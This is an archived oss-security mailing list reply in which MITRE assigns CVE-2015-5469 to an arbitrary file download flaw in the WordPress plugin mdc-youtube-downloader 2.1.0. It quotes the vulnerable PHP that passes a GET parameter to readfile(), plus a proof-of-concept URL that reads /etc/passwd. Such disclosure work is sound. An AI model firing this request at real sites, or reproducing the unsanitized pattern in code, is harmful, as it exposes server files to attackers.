Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Fri, 10 Jul 2015 16:29:44 -0400 (EDT)
From: cve-assign@...re.org
To: larry0@...com
Cc: cve-assign@...re.org, oss-security@...ts.openwall.com
Subject: Re: Remote file download in Wordpress Plugin mdc-youtube-downloader v2.1.0

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> Title: Remote file download in Wordpress Plugin mdc-youtube-downloader v2.1.0
> Download Site: https://wordpress.org/plugins/mdc-youtube-downloader
> Vendor: https://profiles.wordpress.org/mukto90/
> Vendor Notified: 2015-07-01, removed vulnerable code.

> $file_name = $_GET['file'];
> readfile($file_name);

> /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd

> https://wordpress.org/plugins/mdc-youtube-downloader/changelog/
> 2.1.1
> Bug fixed.

> https://plugins.trac.wordpress.org/changeset/1191915

Use CVE-2015-5469.

- -- 
CVE assignment team, MITRE CVE Numbering Authority
M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.14 (SunOS)

iQEcBAEBAgAGBQJVoCmmAAoJEKllVAevmvmsykEH/2NbVNQqD4jmraIaIaClJFp5
P4uQY+BySXHguu5H6AbGni64mQ/FpLqYHpWiQPWJXrzf73ws1P04OJSGZwB0hcB6
dTV6F4F0F1cIrefD2eK7INc6B2twPQ5yZ1kFR7fMnQh1uzUNkoPJgzuUN+QVwhmO
4LlQQyW4+fI/oVqqpgttvr4+FVf8ia2ahxtWkKIoKqt2nfb+7zUFa59jqo76y3mB
wm6oYboSh6Gbu6TfG/+EjiZ3KjMvE98ukXQUOXQpV1BlvpBlTYyMi3jibH8vbSJ+
/7f5r/0arvzwac1sh8TWQAo9SOX3sUWGagEsBMPJ+xxgUukr3O0ekeNu78RTuOU=
=7kCT
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ